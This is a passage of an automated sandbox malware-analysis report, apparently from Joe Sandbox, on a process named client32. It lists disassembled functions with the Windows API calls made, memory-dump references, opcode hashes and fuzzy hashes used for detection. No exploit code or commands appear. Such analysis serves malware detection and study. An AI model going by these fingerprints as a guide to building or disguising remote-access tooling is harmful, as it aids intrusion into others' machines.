                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __strdup
                                                                                                                                        • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                                                                                                        • API String ID: 838363481-1175285396
                                                                                                                                        • Opcode ID: e90a2aaa10d8eacd40dd7991997a438b49a3dcc3dec7f443c349a3eee85cbaf6
                                                                                                                                        • Instruction ID: d368fb1530c02c638087ab9804e20e1779960f820b273a240435e2c59da99733
                                                                                                                                        • Opcode Fuzzy Hash: e90a2aaa10d8eacd40dd7991997a438b49a3dcc3dec7f443c349a3eee85cbaf6
                                                                                                                                        • Instruction Fuzzy Hash: 9FF02875E003566BC311DE1AA804B9FFFEC8F81A68B0480B9EC99D7211EA31E805CBD0
                                                                                                                                        Function 110151B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 110151D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateFileHandle
                                                                                                                                        • String ID: \\.\NSWFPDrv
                                                                                                                                        • API String ID: 3498533004-85019792
                                                                                                                                        • Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                        • Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
                                                                                                                                        • Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                        • Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1
                                                                                                                                        Function 1106132B Relevance: 4.7, APIs: 3, Instructions: 170COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _fgets$_strpbrk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2467700830-0
                                                                                                                                        • Opcode ID: d38be73a97708ed3cebce13a6138e1835c16ac10043bd1595ceda96381bbbe7b
                                                                                                                                        • Instruction ID: e042e00db1c15bd3ea3848fad782c45c58cddd6e5cc14a0db7c635f2d40bc436
                                                                                                                                        • Opcode Fuzzy Hash: d38be73a97708ed3cebce13a6138e1835c16ac10043bd1595ceda96381bbbe7b
                                                                                                                                        • Instruction Fuzzy Hash: 3D51C471E0466A9BDB11CB64DC40FAFBBBCAF85345F0482D8E949D7280EB31AA45CF51
                                                                                                                                        Function 111585E0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _calloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1679841372-0
                                                                                                                                        • Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                        • Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
                                                                                                                                        • Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                        • Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0
                                                                                                                                        Function 688F8FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 688F8FE4
                                                                                                                                        • getsockname.WSOCK32(?,?,00000010,?,025E2EF8,?), ref: 688F9005
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,00000010,?,025E2EF8,?), ref: 688F902E
                                                                                                                                          • Part of subcall function 688F5840: inet_ntoa.WSOCK32(00000080,?,00000000,?,688F8F91,00000000,00000000,6893B8DA,?,00000080), ref: 688F5852
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3066294524-0
                                                                                                                                        • Opcode ID: 9fc7b51f5081a0d40eb5227b2282faae5e67f2a75bf40badeb221862bee64e2c
                                                                                                                                        • Instruction ID: 87fbcd10e4bc6e2615f8f8f5fe31b4a12c03be1feeb8af38397fa5932188a82b
                                                                                                                                        • Opcode Fuzzy Hash: 9fc7b51f5081a0d40eb5227b2282faae5e67f2a75bf40badeb221862bee64e2c
                                                                                                                                        • Instruction Fuzzy Hash: 92111C76A0811CABCB10DFA9DD01ABFB7B8EB59214F40456AEC05E7240E770AA15CB91
                                                                                                                                        Function 1110E3C0 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                        • __wsplitpath.LIBCMT ref: 1110E405
                                                                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryInformationSystemVolume__wsplitpath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 395646034-0
                                                                                                                                        • Opcode ID: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
                                                                                                                                        • Instruction ID: 49ee09b274793d3f37b85f9af0a235e2207b6666fb7fe841f2bc02eb00c982ac
                                                                                                                                        • Opcode Fuzzy Hash: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
                                                                                                                                        • Instruction Fuzzy Hash: 5911A135A4021DABEB14CB94CC42FEDF378AB48B04F1040D5E724AB1C0E7B02A08CB65
                                                                                                                                        Function 1109DCF0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                          • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,7622F550,?,00000000), ref: 1109DC58
                                                                                                                                          • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                          • Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,004B11D8,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                          • Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,004B11D8,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2256153495-0
                                                                                                                                        • Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                        • Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
                                                                                                                                        • Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                        • Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61
                                                                                                                                        Function 1110C6B0 Relevance: 3.8, APIs: 3, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSection.KERNEL32(111EC8B8,A0A8B03E,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
                                                                                                                                        • EnterCriticalSection.KERNEL32(111EC8B8,A0A8B03E,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3991485460-0
                                                                                                                                        • Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                        • Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
                                                                                                                                        • Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                        • Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91
                                                                                                                                        Function 11067F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: ??CTL32.DLL
                                                                                                                                        • API String ID: 1029625771-2984404022
                                                                                                                                        • Opcode ID: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                                        • Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
                                                                                                                                        • Opcode Fuzzy Hash: 615eeb59653b4affda5163e153b258362ea43afe93827aa1a1d90bc76bfb298e
                                                                                                                                        • Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91
                                                                                                                                        Function 110267B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetDriveTypeA.KERNEL32(?), ref: 110267DD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
